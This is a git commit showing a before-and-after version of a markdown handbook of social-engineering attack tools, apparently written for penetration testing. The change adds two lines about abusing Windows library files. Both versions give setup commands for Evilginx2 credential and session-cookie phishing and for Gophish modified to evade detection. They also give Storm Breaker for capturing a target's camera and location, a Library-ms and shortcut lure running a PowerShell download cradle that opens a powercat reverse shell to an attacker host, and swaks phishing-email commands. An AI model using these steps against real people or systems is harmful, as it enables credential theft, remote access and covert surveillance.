handbooks/13_social_engineering_tools.md, before:

# Social Engineering Tools

- [Resources](#resources)

## Table of Contents

- [Evilginx2](#evilginx2)
- [Gophish](#gophish)
- [Microsoft Windows Library Files](#microsoft-windows-library-files)
- [Storm Breaker](#storm-breaker)
- [The Social Engineering Toolkit (SET)](#the-social-engineering-toolkit-set)

## Resources

| Name | Description | URL |
| --- | --- | --- |
| BlackPhish | Super lightweight with many features and blazing fast speeds. | https://github.com/iinc0gnit0/BlackPhish |
| Evilginx2 Phishlets | Evilginx2 Phishlets version (0.2.3) Only For Testing/Learning Purposes | https://github.com/An0nUD4Y/Evilginx2-Phishlets |
| evilginx2 | Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication | https://github.com/kgretzky/evilginx2 |
| evilgophish | evilginx2 + gophish | https://github.com/fin3ss3g0d/evilgophish |
| EvilnoVNC | Ready to go Phishing Platform | https://github.com/JoelGMSec/EvilnoVNC |
| Gophish | Open-Source Phishing Toolkit | https://github.com/gophish/gophish |
| Nexphisher | Advanced Phishing tool for Linux & Termux | https://github.com/htr-tech/nexphisher |
| SocialFish | Phishing Tool & Information Collector  | https://github.com/UndeadSec/SocialFish |
| SniperPhish | SniperPhish - The Web-Email Spear Phishing Toolkit | https://github.com/GemGeorge/SniperPhish |
| Storm Breaker | Social engineering tool [Access Webcam & Microphone & Location Finder] With {Py,JS,PHP} | https://github.com/ultrasecurity/Storm-Breaker |
| The Social-Engineer Toolkit (SET) | The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. | https://github.com/trustedsec/social-engineer-toolkit |

## Evilginx2

> https://help.evilginx.com/docs/getting-started/building

> https://help.evilginx.com/docs/getting-started/quick-start

> https://help.evilginx.com/docs/guides/phishlets

### Installation

```c
$ sudo apt-get install golang
$ git clone https://github.com/kgretzky/evilginx2.git
$ cd evilginx2
$ make
$ sudo ./build/evilginx -p ./phishlets
```

#### Alternatively with Redirectors

```c
$ sudo ./build/evilginx -p ./phishlets -t ./redirectors -developer
```

### Basic Commands

```c
: phishlets
: lures
: sessions
```

### Prepare Certificates

```c
$ sudo cp /root/.evilginx/crt/ca.crt /usr/local/share/ca-certificates/evilginx.crt
$ sudo update-ca-certificates
```

### Domain Setup

```c
: config domain <DOMAIN>
: config ipv4 <LHOST>
```

### Phishlets

> https://help.evilginx.com/docs/guides/phishlets

> https://github.com/An0nUD4Y/Evilginx2-Phishlets

```c
: phishlets hostname <PHISHLET> <DOMAIN>
: phishlets enable <PHISHLET>
```

### Lures

> https://help.evilginx.com/docs/guides/lures

```c
: lures create <PHISHLET>
: lures get-url <ID>
```

### Session Handling

```c
: sessions
: sessions <ID>
```

## Gophish

> https://github.com/gophish/gophish

> https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean

### GoPhish Modification

> https://github.com/puzzlepeaches/sneaky_gophish

> https://www.redteam.cafe/phishing/gophish-mods

#### Clone GoPhish

```c
$ git clone https://github.com/gophish/gophish
```

#### Get a Custom 404 Page

```c
$ wget "https://raw.githubusercontent.com/puzzlepeaches/sneaky_gophish/main/files/404.html" -O "404.html"
```

#### Get a Custom Phish.go

```c
$ wget "https://raw.githubusercontent.com/puzzlepeaches/sneaky_gophish/main/files/phish.go" -O "phish.go"
```

#### Copy Custom Phish.go

```c
$ rm gophish/controllers/phish.go
$ mv phish.go gophish/controllers/phish.go
```

#### Copy new 404.html

```c
$ mv 404.html gophish/templates/404.html
```

```c
$ cd gophish
```

```c
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go
```

#### Stripping X-Gophish-Signature

```c
$ sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go
```

#### Changing servername

```c
$ sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go
```

#### Changing rid value

```c
$ read -p 'Custom RID Parameter: ' uservar
$ sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "'$uservar'"/g' models/campaign.go
```

#### Build

```c
$ go build
```

### Port Forwarding

```c
$ ssh -i ~/.ssh/<SSH_KEY> root@<RHOST> -p <RPORT> -L 3333:localhost:3333 -N -f
```

## Microsoft Windows Library Files

### Installation of wsgidav

```c
$ pip3 install wsgidav
```

### Start wsgidav

```c
$ wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /PATH/TO/DIRECTORY/webdav/
```

### config.Library-ms

```c
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<LHOST></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
```

### Shortcut File

Right-click on Windows to create a new `shortcut file`.

```c
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1'); powercat -c <LHOST> -p <LPORT> -e powershell"
```

Put the `shortcut file` into the webdav folder.

### Send Phishing Email

```c
$ swaks --server <RHOST> -t <EMAIL> -t <EMAIL> --from <EMAIL> --header "Subject: Staging Script" --body <FILE>.txt --attach @<FILE> --suppress-data -ap
```

## Storm Breaker

> https://medium.com/@frost1/access-location-camera-microphone-of-any-device-547c5b9907f3

### Installation

```c
$ git clone https://github.com/ultrasecurity/Storm-Breaker.git
$ cd Storm-Breaker
$ sudo bash install.sh
$ sudo python3 -m pip install -r requirements.txt
$ sudo python3 st.py
```

### Start ngrok Agent

```c
$ ngrok http 2525
```

> http://8d0b-92-180-8-97.ngrok-free.app -> http://localhost:2525

| Username | Password |
| --- | --- |
| admin | admin |

Chose a link to send to the target.

> http://8d0b-92-180-8-97.ngrok-free.app/templates/nearyou/index.html

## The Social Engineering Toolkit (SET)

### Credential Harvesting

```c
$ sudo setoolkit
```

Navigate to `Social-Engineering Attacks` > `Website Attack Vectors` > `Credential Harvester Attack` > `Site Cloner` == `1`, `2`, `3`, `2`.

```c
$ swaks --to <EMAIL> --from <EMAIL> --server <RHOST> --port 25 --body <FILE>.txt
```

Commit message:

added some explanation for abusing library files

handbooks/13_social_engineering_tools.md, after:

# Social Engineering Tools

- [Resources](#resources)

## Table of Contents

- [Evilginx2](#evilginx2)
- [Gophish](#gophish)
- [Microsoft Windows Library Files](#microsoft-windows-library-files)
- [Storm Breaker](#storm-breaker)
- [The Social Engineering Toolkit (SET)](#the-social-engineering-toolkit-set)

## Resources

| Name | Description | URL |
| --- | --- | --- |
| BlackPhish | Super lightweight with many features and blazing fast speeds. | https://github.com/iinc0gnit0/BlackPhish |
| Evilginx2 Phishlets | Evilginx2 Phishlets version (0.2.3) Only For Testing/Learning Purposes | https://github.com/An0nUD4Y/Evilginx2-Phishlets |
| evilginx2 | Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication | https://github.com/kgretzky/evilginx2 |
| evilgophish | evilginx2 + gophish | https://github.com/fin3ss3g0d/evilgophish |
| EvilnoVNC | Ready to go Phishing Platform | https://github.com/JoelGMSec/EvilnoVNC |
| Gophish | Open-Source Phishing Toolkit | https://github.com/gophish/gophish |
| Nexphisher | Advanced Phishing tool for Linux & Termux | https://github.com/htr-tech/nexphisher |
| SocialFish | Phishing Tool & Information Collector  | https://github.com/UndeadSec/SocialFish |
| SniperPhish | SniperPhish - The Web-Email Spear Phishing Toolkit | https://github.com/GemGeorge/SniperPhish |
| Storm Breaker | Social engineering tool [Access Webcam & Microphone & Location Finder] With {Py,JS,PHP} | https://github.com/ultrasecurity/Storm-Breaker |
| The Social-Engineer Toolkit (SET) | The Social-Engineer Toolkit is an open-source penetration testing framework designed for social engineering. | https://github.com/trustedsec/social-engineer-toolkit |

## Evilginx2

> https://help.evilginx.com/docs/getting-started/building

> https://help.evilginx.com/docs/getting-started/quick-start

> https://help.evilginx.com/docs/guides/phishlets

### Installation

```c
$ sudo apt-get install golang
$ git clone https://github.com/kgretzky/evilginx2.git
$ cd evilginx2
$ make
$ sudo ./build/evilginx -p ./phishlets
```

#### Alternatively with Redirectors

```c
$ sudo ./build/evilginx -p ./phishlets -t ./redirectors -developer
```

### Basic Commands

```c
: phishlets
: lures
: sessions
```

### Prepare Certificates

```c
$ sudo cp /root/.evilginx/crt/ca.crt /usr/local/share/ca-certificates/evilginx.crt
$ sudo update-ca-certificates
```

### Domain Setup

```c
: config domain <DOMAIN>
: config ipv4 <LHOST>
```

### Phishlets

> https://help.evilginx.com/docs/guides/phishlets

> https://github.com/An0nUD4Y/Evilginx2-Phishlets

```c
: phishlets hostname <PHISHLET> <DOMAIN>
: phishlets enable <PHISHLET>
```

### Lures

> https://help.evilginx.com/docs/guides/lures

```c
: lures create <PHISHLET>
: lures get-url <ID>
```

### Session Handling

```c
: sessions
: sessions <ID>
```

## Gophish

> https://github.com/gophish/gophish

> https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean

### GoPhish Modification

> https://github.com/puzzlepeaches/sneaky_gophish

> https://www.redteam.cafe/phishing/gophish-mods

#### Clone GoPhish

```c
$ git clone https://github.com/gophish/gophish
```

#### Get a Custom 404 Page

```c
$ wget "https://raw.githubusercontent.com/puzzlepeaches/sneaky_gophish/main/files/404.html" -O "404.html"
```

#### Get a Custom Phish.go

```c
$ wget "https://raw.githubusercontent.com/puzzlepeaches/sneaky_gophish/main/files/phish.go" -O "phish.go"
```

#### Copy Custom Phish.go

```c
$ rm gophish/controllers/phish.go
$ mv phish.go gophish/controllers/phish.go
```

#### Copy new 404.html

```c
$ mv 404.html gophish/templates/404.html
```

```c
$ cd gophish
```

```c
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go
$ sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go
```

#### Stripping X-Gophish-Signature

```c
$ sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go
```

#### Changing servername

```c
$ sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go
```

#### Changing rid value

```c
$ read -p 'Custom RID Parameter: ' uservar
$ sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "'$uservar'"/g' models/campaign.go
```

#### Build

```c
$ go build
```

### Port Forwarding

```c
$ ssh -i ~/.ssh/<SSH_KEY> root@<RHOST> -p <RPORT> -L 3333:localhost:3333 -N -f
```

## Microsoft Windows Library Files

### Installation of wsgidav

```c
$ pip3 install wsgidav
```

### Start wsgidav

```c
$ wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /PATH/TO/DIRECTORY/webdav/
```

### config.Library-ms

```c
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<name>@windows.storage.dll,-34582</name>
<version>6</version>
<isLibraryPinned>true</isLibraryPinned>
<iconReference>imageres.dll,-1003</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<isDefaultSaveLocation>true</isDefaultSaveLocation>
<isSupported>false</isSupported>
<simpleLocation>
<url>http://<LHOST></url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
```

Put the `config.Library-ms` file in the `webdav` folder.

### Shortcut File

Right-click on Windows to create a new `shortcut file`.

```c
powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<LHOST>/powercat.ps1'); powercat -c <LHOST> -p <LPORT> -e powershell"
```

Put the `shortcut file (*.lnk)` into the `webdav` folder.

### Send Phishing Email

```c
$ swaks --server <RHOST> -t <EMAIL> -t <EMAIL> --from <EMAIL> --header "Subject: Staging Script" --body <FILE>.txt --attach @<FILE> --suppress-data -ap
```

## Storm Breaker

> https://medium.com/@frost1/access-location-camera-microphone-of-any-device-547c5b9907f3

### Installation

```c
$ git clone https://github.com/ultrasecurity/Storm-Breaker.git
$ cd Storm-Breaker
$ sudo bash install.sh
$ sudo python3 -m pip install -r requirements.txt
$ sudo python3 st.py
```

### Start ngrok Agent

```c
$ ngrok http 2525
```

> http://8d0b-92-180-8-97.ngrok-free.app -> http://localhost:2525

| Username | Password |
| --- | --- |
| admin | admin |

Chose a link to send to the target.

> http://8d0b-92-180-8-97.ngrok-free.app/templates/nearyou/index.html

## The Social Engineering Toolkit (SET)

### Credential Harvesting

```c
$ sudo setoolkit
```

Navigate to `Social-Engineering Attacks` > `Website Attack Vectors` > `Credential Harvester Attack` > `Site Cloner` == `1`, `2`, `3`, `2`.

```c
$ swaks --to <EMAIL> --from <EMAIL> --server <RHOST> --port 25 --body <FILE>.txt
```
